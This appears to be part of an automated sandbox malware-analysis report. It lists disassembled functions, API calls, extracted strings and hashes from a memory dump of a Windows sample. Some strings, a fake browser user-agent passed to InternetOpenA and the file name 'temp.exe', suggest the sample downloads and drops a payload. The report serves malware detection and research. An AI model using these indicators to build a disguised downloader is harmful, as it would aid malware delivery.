• Instruction ID: d29656097f0dc0dd329009090e6555dfec23375dc0e0ea63ad666628ca43aa3b
• Opcode Fuzzy Hash: b74da0006d2b9eb88b22b94e661f24eac192464dd268b17aefa4fabd8b11d209
• Instruction Fuzzy Hash: 23F0C036540225BBCF221FD5DC0899A3FB6FB493A1F058054FA1ED6531D7328DA0DB94
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 00162B02
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 47e3034d0bf22f278a6a5b6ef1306240cef614ec9fa158a01e7a7a9078f7d1d8
• Instruction ID: 964edff061a839ceede7cc003e90e0f6b1e5921fe7c92c36520ca32c648ba9cb
• Opcode Fuzzy Hash: 47e3034d0bf22f278a6a5b6ef1306240cef614ec9fa158a01e7a7a9078f7d1d8
• Instruction Fuzzy Hash: F9414871900609AFCF16DF98CD81EEEBBB5FF48300F188199F908AB261D3369961DB51
APIs
• __EH_prolog3_GS.LIBCMT ref: 001576D8
  • Part of subcall function 001461C0: __EH_prolog3_GS.LIBCMT ref: 001461C7
  • Part of subcall function 001461C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0014629D
  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
  • Part of subcall function 0014E19F: __EH_prolog3.LIBCMT ref: 0014E1A6
Strings
• Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 001576E4
• temp.exe, xrefs: 001577C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3H_prolog3_$InternetOpen
                                                                                                                                                                                                • String ID: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$temp.exe
                                                                                                                                                                                                • API String ID: 2236497292-3505050493
                                                                                                                                                                                                • Opcode ID: f32d5e026baa0effaf3f73e8ee513b62727dd918c45e77fb37f2d704b2e6abfc
                                                                                                                                                                                                • Instruction ID: 152ca6aa597bb71a9981c5c6a0c054eb8e26d94f31c57950bcf4f2ddb3610a3d
                                                                                                                                                                                                • Opcode Fuzzy Hash: f32d5e026baa0effaf3f73e8ee513b62727dd918c45e77fb37f2d704b2e6abfc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B418031D00248EADF05EBB4D896BDDB775AF28300F5084A8E515B70E2EB745B08CB62

APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
Strings
• stoull argument out of range, xrefs: 0015C267
• invalid stoull argument, xrefs: 0015C25D
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_catch_
• String ID: invalid stoull argument$stoull argument out of range
• API String ID: 1329019490-980025665
• Opcode ID: 4318639802de8004efbc08a5b5040f6d3d6717e6c8853bad029e9fee82ec6ff6
• Instruction ID: 3d7a3a4249dd850efd948c3ac7ab24910db39a6bc86fedbd75fb441ef98bdb10
• Opcode Fuzzy Hash: 4318639802de8004efbc08a5b5040f6d3d6717e6c8853bad029e9fee82ec6ff6
• Instruction Fuzzy Hash: 5E414B31D00248DFCF04DF98C881ADCBBB1BF64315F658159E825BB261D770AE85CB94

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_
• String ID: H$value
• API String ID: 2427045233-2917141609
• Opcode ID: 0c8f84e170f8cb8b08c8a20835f71b87578575225ffff5c8170bf2071778967e
• Instruction ID: 97558be6d3406d058d14e2083734cc077108c4b99f35c3d67342e4e4c2549d76
• Opcode Fuzzy Hash: 0c8f84e170f8cb8b08c8a20835f71b87578575225ffff5c8170bf2071778967e
• Instruction Fuzzy Hash: 65319AB1D01248DFEB04EBA4C946BEEBBB4AF29310F5045ACE508B71A2D7745F09CB52

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_
• String ID: H$value
• API String ID: 2427045233-2917141609
• Opcode ID: e4020cd78749a497b5e953225c3e216e5d61f7f1b0412b1a68abae6cb02ccca2
• Instruction ID: 00560374abf881b5dc3f5950394cca9f8e43d7b51a30f957a3ba1d71a67e9297
• Opcode Fuzzy Hash: e4020cd78749a497b5e953225c3e216e5d61f7f1b0412b1a68abae6cb02ccca2
• Instruction Fuzzy Hash: 93319DB1C01248EFEB04DBB8C945BDDBBB4AF29314F5084ACE119B72A2D7745B09CB25

APIs
• __EH_prolog3.LIBCMT ref: 00145FC0
  • Part of subcall function 00145D26: __EH_prolog3_GS.LIBCMT ref: 00145D2D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3H_prolog3_
• String ID: at line $, column
• API String ID: 3355343447-191570568
• Opcode ID: 1d697f367073a4c77fa17b4b67f7e4b40920f70dfa3bf1a985a979f502b2c671
• Instruction ID: 12cee2f360f9a5b3a0a2f857d786ba3e033a29ade92624cc77e87ca1a582b989
• Opcode Fuzzy Hash: 1d697f367073a4c77fa17b4b67f7e4b40920f70dfa3bf1a985a979f502b2c671
• Instruction Fuzzy Hash: 1C21C270E402059FDB08EFA8C8927AEBBF1AF94300F55452DE115E7392DBB45B01CB92

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_
• String ID: /?#$://
• API String ID: 2427045233-1756703676
• Opcode ID: 3d0796466d33fab8ee6656626ed945593291b3c2f39db795109260bad68d8d95
• Instruction ID: cfb33e7a9fa936cd378c9607bf1228781993ec1a6ae15ae375766e7a4805e022
• Opcode Fuzzy Hash: 3d0796466d33fab8ee6656626ed945593291b3c2f39db795109260bad68d8d95
• Instruction Fuzzy Hash: 4E11AA302042248ACF289B249DA1BFE3770AF52318F25426DF1666B1E1CB705A45CEA1

APIs
• __EH_prolog3.LIBCMT ref: 00157B4D
  • Part of subcall function 0014A6BD: __EH_prolog3.LIBCMT ref: 0014A6C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
• Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3
• String ID: 3e3$4e4
• API String ID: 431132790-2404590204
• Opcode ID: d4a221eebe43ce111555083141b53b467f84ca3242ff02974584452579e46237
• Instruction ID: cd276f2a5c5a147af5a3e7c0a0a1053ecdcf5a4b0df72b0d5199e97f064fe92a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a221eebe43ce111555083141b53b467f84ca3242ff02974584452579e46237
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9511A971A00609AFDB14EFBCC84569EBAB59F58720F10473DE025E72D1CB749F058752
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                • String ID: : 0x$invalid UTF-8 byte at index
                                                                                                                                                                                                • API String ID: 431132790-1231261809
                                                                                                                                                                                                • Opcode ID: 4f521bbe6c437271dfca01997a40d3cbe212298ccbcac8e45ea8167d7db68abe
                                                                                                                                                                                                • Instruction ID: a93047a7a6e85670749b3d5eb355e47d29884b15fda2cad62d3199888130b8bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f521bbe6c437271dfca01997a40d3cbe212298ccbcac8e45ea8167d7db68abe
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48018BB0B44305ABDF1CAFB8C88155EB6B2AF58304B41483DF506E7392CB759A048B96
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001556AA
                                                                                                                                                                                                  • Part of subcall function 001568CD: __EH_prolog3.LIBCMT ref: 001568D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                                • String ID: .txt$1735725939
                                                                                                                                                                                                • API String ID: 3355343447-161451348
                                                                                                                                                                                                • Opcode ID: a56b4fd298cb843c5fcda318f1bc2c2cd246919fb4519e7c63a6677bb2e87ceb
                                                                                                                                                                                                • Instruction ID: 4639c0ac9f28bc0047033326648db0aa35dc00dbd2e4e0169a8a90d5360eb90f
                                                                                                                                                                                                • Opcode Fuzzy Hash: a56b4fd298cb843c5fcda318f1bc2c2cd246919fb4519e7c63a6677bb2e87ceb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6401D670505204CBCF08F7A0E5A29DC77B1EF68320F94422DE041271E2DF701E86CB96